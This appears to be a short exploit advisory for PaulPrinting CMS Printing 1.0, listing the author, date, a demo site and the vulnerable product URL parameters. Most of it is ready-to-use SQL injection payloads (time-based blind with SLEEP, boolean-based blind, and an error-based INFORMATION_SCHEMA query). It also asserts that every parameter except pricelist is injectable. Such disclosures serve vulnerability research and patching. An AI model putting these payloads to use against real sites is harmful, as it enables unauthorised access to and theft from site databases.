# Exploit Title: PaulPrinting CMS Printing 1.0 – SQL Injection
# Exploit Date: 2018-05-19
# Software Link: https://codecanyon.net/item/paulprinting-cms-printing-solutions/19546365
# Author: Mehmet Onder Key
# Version: 1.0
# Tested On: Linux
# 1. Description
# Any visitor can run code to exploit css and sql vulnerabilities in the
# products and order sections.
# 2. Proof of Concept
# Example parameter with demo site : http://demo.codepaul.com/
# printing/products/businesscard?pricelist=1&format=90×50&pages=2p4cf&
# paper=300g_ma&refinement=lamco
# Time-Based Blind SQL Payload:
format=keyney+akkus’) OR SLEEP(5)– DLea
# Boolean-Based Blind SQL Payload:
refinement=were’) OR NOT 4134=4134#
# Error-Based SQL Payload
paper=here’) OR (SELECT 1712 FROM(SELECT COUNT(*),CONCAT(0x71706b6a71,(SELECT
(ELT(1712=1712,1))),0x7171706a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)– oXDz
etc… (all parameter is effected -pricelist)